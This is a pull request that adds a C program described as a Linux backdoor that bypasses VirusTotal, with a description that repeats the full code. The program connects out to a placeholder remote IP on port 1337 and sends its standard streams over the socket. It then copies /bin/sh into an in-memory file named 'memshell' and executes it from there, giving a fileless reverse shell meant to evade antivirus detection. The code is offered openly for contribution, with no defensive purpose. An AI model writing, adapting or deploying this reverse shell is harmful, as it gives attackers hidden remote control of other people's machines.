### PR TITLE
Create linux_bd linux VT bypass backdoor : )

### DIFF
--- a/linux_bd
+++ b/linux_bd
@@ -1,0 +1,64 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/mman.h>
+
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <string.h>
+#include <fcntl.h>
+#include <errno.h>
+
+#define REMOTE_IP "IP"
+#define REMOTE_PORT  1337
+
+int main() {
+    int sock = socket(AF_INET, SOCK_STREAM, 0);
+    if(sock < 0) { perror("socket"); return 1; }
+
+    struct sockaddr_in addr;
+    addr.sin_family = AF_INET;
+    addr.sin_port = htons(REMOTE_PORT);
+    addr.sin_addr.s_addr = inet_addr(REMOTE_IP);
+
+    if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
+        perror("connect"); return 1;
+    }
+
+    
+    dup2(sock, 0);
+    dup2(sock, 1);
+    dup2(sock, 2);
+
+    
+    int fd = memfd_create("memshell", MFD_CLOEXEC);
+    if(fd == -1) { perror("memfd_create"); return 1; }
+
+    
+    const char *shell_path = "/bin/sh";
+    int bin_fd = open(shell_path, O_RDONLY);
+    if(bin_fd < 0) { perror("open"); return 1; }
+
+    char buf[4096];
+    ssize_t n;
+    while((n = read(bin_fd, buf, sizeof(buf))) > 0) {
+        if(write(fd, buf, n) != n) { perror("write"); return 1; }
+    }
+    close(bin_fd);
+
+    
+    lseek(fd, 0, SEEK_SET);
+
+    
+    char *const argv[] = { "sh", NULL };
+    char *const envp[] = { NULL };
+
+    if(fexecve(fd, argv, envp) == -1) {
+        perror("fexecve");
+        return 1;
+    }
+
+    return 0;
+}
+         


### PR DESCRIPTION
hey WoprBot,

devil this side maded an simple loader type backdoor which create an file at memory and took /bin/sh run there rather running from main disk which make it bypassable i used memfd which create memshell with having copy of /bin/sh and run execute from there to work for socket connection 
you can check  to contribute my code 

```#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>

#include <sys/socket.h>
#include <arpa/inet.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>

#define REMOTE_IP "IP"
#define REMOTE_PORT  1337

int main() {
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if(sock < 0) { perror("socket"); return 1; }

    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(REMOTE_PORT);
    addr.sin_addr.s_addr = inet_addr(REMOTE_IP);

    if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
        perror("connect"); return 1;
    }

    
    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);

    
    int fd = memfd_create("memshell", MFD_CLOEXEC);
    if(fd == -1) { perror("memfd_create"); return 1; }

    
    const char *shell_path = "/bin/sh";
    int bin_fd = open(shell_path, O_RDONLY);
    if(bin_fd < 0) { perror("open"); return 1; }

    char buf[4096];
    ssize_t n;
    while((n = read(bin_fd, buf, sizeof(buf))) > 0) {
        if(write(fd, buf, n) != n) { perror("write"); return 1; }
    }
    close(bin_fd);

    
    lseek(fd, 0, SEEK_SET);

    
    char *const argv[] = { "sh", NULL };
    char *const envp[] = { NULL };

    if(fexecve(fd, argv, envp) == -1) {
        perror("fexecve");
        return 1;
    }

    return 0;
}
         ```